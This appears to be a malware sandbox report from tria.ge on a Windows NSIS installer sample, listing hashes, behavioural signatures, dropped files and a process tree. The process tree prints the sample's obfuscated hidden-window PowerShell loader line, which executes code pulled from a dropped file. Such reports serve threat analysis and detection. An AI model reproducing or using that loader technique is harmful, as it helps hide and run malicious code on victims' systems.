Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

49274bd66a...0a.exe

windows7-x64

8

49274bd66a...0a.exe

windows10-2004-x64

8

$PLUGINSDI...ge.dll

windows7-x64

1

$PLUGINSDI...ge.dll

windows10-2004-x64

1

$PLUGINSDI...fo.dll

windows7-x64

3

$PLUGINSDI...fo.dll

windows10-2004-x64

3

$PLUGINSDI...gs.dll

windows7-x64

3

$PLUGINSDI...gs.dll

windows10-2004-x64

3

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    05/07/2024, 16:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    49274bd66a4d53ca004a0a58c15496292a323f229b9712e5f3994af5c307bc0a.exe

  • Size

    473KB

  • MD5

    33bc360990c66beea144ae48d17504a6

  • SHA1

    7dfb4c70ef7d73c8618ce8799d414ba3c3fe9684

  • SHA256

    49274bd66a4d53ca004a0a58c15496292a323f229b9712e5f3994af5c307bc0a

  • SHA512

    a83b83ff3c462d39351553372055e0c16d98c8cfe3083c6958b631861575901cf68925d6a7dadab68f3c78deb59bab7d3d7541946f6e6b69073a5007fd3af1dd

  • SSDEEP

    12288:TKYi/Le1bRNn/XoeBKk3nM40FC8/1YnrfY2:OFDe111/XlBLv0FCOcrfY2

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Loads dropped DLL 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
    installer
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\49274bd66a4d53ca004a0a58c15496292a323f229b9712e5f3994af5c307bc0a.exe
    "C:\Users\Admin\AppData\Local\Temp\49274bd66a4d53ca004a0a58c15496292a323f229b9712e5f3994af5c307bc0a.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Users\Admin\AppData\Local\Temp\Slringsnettets.exe
        "C:\Users\Admin\AppData\Local\Temp\Slringsnettets.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:1272

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag
    Filesize

    66KB

    MD5

    a4b2bd7f121cc14e7aab05a8ffbb5baf

    SHA1

    722dab40a35645c7b1509fef35892c9b181e1ee6

    SHA256

    1cca145232a34bca0954995d0807c3ebe65c397b9b389eded731f4f0b070ae55

    SHA512

    0f066e1b87bddd3034eade969db37837c1fa104be0c3a5f8aa7c3a91e975ba8cdbfdf1f376aecb5f40531b4505ed625f3c5f9e12ec5943fe5eb36d3877fab7c2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\Vehftes.Red
    Filesize

    340KB

    MD5

    b6edc4ee879f912d3aba560ce2a3ba8d

    SHA1

    fc51052392372b65f5abf375d805f89fdbeda043

    SHA256

    2d070f42aaccd649f2182e50af8cc227a910e9fe0849080a395edfc86f1267a3

    SHA512

    a1c6cae8ee4457d8a9d9430efdb6730e35c8b961a1a9f50992f7069843abb42963a66e639bea9d6c1496bf8797c4475c6cb938579dbdd40c296263aeaed35eb1

    Download Submit

  • C:\Users\Admin\Desktop\Flyverdragter.lnk
    Filesize

    1KB

    MD5

    9db3e04a27bf798853955f8a66d881e3

    SHA1

    df8590ce2f583bdd5a4bf0cbf384a2ab60917a4c

    SHA256

    5a505e6274548bee4ce1f7aa6da254d45527903b59f74c25f076dc46dcb8f40c

    SHA512

    3d32254bef6b2a7e298ae3b826710d0a552e2264a602cd23a1898d58c0787dfb19736aefbfce36b1a17d8301a7f367f32ce1c3914388026fa99d012099b4a5b4

    Download Submit

  • \Users\Admin\AppData\Local\Temp\Slringsnettets.exe
    Filesize

    473KB

    MD5

    33bc360990c66beea144ae48d17504a6

    SHA1

    7dfb4c70ef7d73c8618ce8799d414ba3c3fe9684

    SHA256

    49274bd66a4d53ca004a0a58c15496292a323f229b9712e5f3994af5c307bc0a

    SHA512

    a83b83ff3c462d39351553372055e0c16d98c8cfe3083c6958b631861575901cf68925d6a7dadab68f3c78deb59bab7d3d7541946f6e6b69073a5007fd3af1dd

    Download Submit

  • \Users\Admin\AppData\Local\Temp\nso1833.tmp\BgImage.dll
    Filesize

    7KB

    MD5

    350a507070ed063ac6a511aeef67861a

    SHA1

    cf647b90a1212e090f1d236d1b50a5010cbf3bae

    SHA256

    5c66abd3f06eaa357ed9663224c927cf7120dca010572103faa88832bb31c5ab

    SHA512

    cde5747cc8539625e4262afad9699ce4e8325133d7ed7f47b9d46989a7aa0d2cc2488441acc57368f485ef1dd3e02b9ef2faa642f68e9f1db53a39e0f896d468

    Download Submit

  • \Users\Admin\AppData\Local\Temp\nso1833.tmp\nsDialogs.dll
    Filesize

    9KB

    MD5

    13b6a88cf284d0f45619e76191e2b995

    SHA1

    09ebb0eb4b1dca73d354368414906fc5ad667e06

    SHA256

    cb958e21c3935ef7697a2f14d64cae0f9264c91a92d2deeb821ba58852dac911

    SHA512

    2aeeae709d759e34592d8a06c90e58aa747e14d54be95fb133994fdcebb1bdc8bc5d82782d0c8c3cdfd35c7bea5d7105379d3c3a25377a8c958c7b2555b1209e

    Download Submit

  • \Users\Admin\AppData\Local\Temp\nso1833.tmp\nsExec.dll
    Filesize

    6KB

    MD5

    b648c78981c02c434d6a04d4422a6198

    SHA1

    74d99eed1eae76c7f43454c01cdb7030e5772fc2

    SHA256

    3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

    SHA512

    219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

    Download Submit

  • memory/884-189-0x00000000742D0000-0x000000007487B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/884-188-0x00000000742D0000-0x000000007487B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/884-187-0x00000000742D0000-0x000000007487B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/884-192-0x00000000742D0000-0x000000007487B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/884-186-0x00000000742D0000-0x000000007487B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/884-194-0x00000000742D0000-0x000000007487B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/884-195-0x0000000006660000-0x0000000007FA1000-memory.dmp

    Filesize

    25.3MB

    Download

  • memory/884-185-0x00000000742D1000-0x00000000742D2000-memory.dmp

    Filesize

    4KB

    Download

  • memory/884-207-0x00000000742D0000-0x000000007487B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1272-200-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1272-224-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

    Download